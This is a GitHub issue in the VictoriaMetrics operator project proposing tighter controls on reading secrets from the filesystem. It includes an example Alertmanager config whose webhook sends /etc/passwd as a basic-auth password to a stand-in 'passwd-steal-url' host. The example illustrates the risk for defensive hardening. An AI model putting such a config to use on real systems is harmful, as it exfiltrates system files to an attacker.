Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security improvements for filesystem access. #899

Open
f41gh7 opened this issue Mar 11, 2024 · 0 comments
Open

Security improvements for filesystem access. #899

f41gh7 opened this issue Mar 11, 2024 · 0 comments
Assignees
@f41gh7
Labels
enhancement New feature or request

Comments

@f41gh7
Copy link
Collaborator

f41gh7 commented Mar 11, 2024

Currently, VictoriaMetrics components supports secrets reading from on-disk filesystem. It improves security for general case, when service owner doesn't share access to it with other users.

In case, of operator based deployments, when scrapping and alerting configuration delegated to the users. It could be an issue.

For instance, vmalertmanagerconfig may have a following configuration:

kind VMAlertmanagerConfig
spec:
  receivers:
  - name: webhook-read-passwd
    url: http://passwd-steal-url
    http_config:
      basic_auth:
        password_file: /etc/passwd

We could extend the following configuration param https://docs.victoriametrics.com/operator/api/#arbitraryfsaccessthroughsmsconfig to the other components, that using filesystem secrets.
@f41gh7 f41gh7 added the enhancement New feature or request label Mar 12, 2024
@f41gh7 f41gh7 self-assigned this Jul 30, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@f41gh7 f41gh7

Labels
enhancement New feature or request
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@f41gh7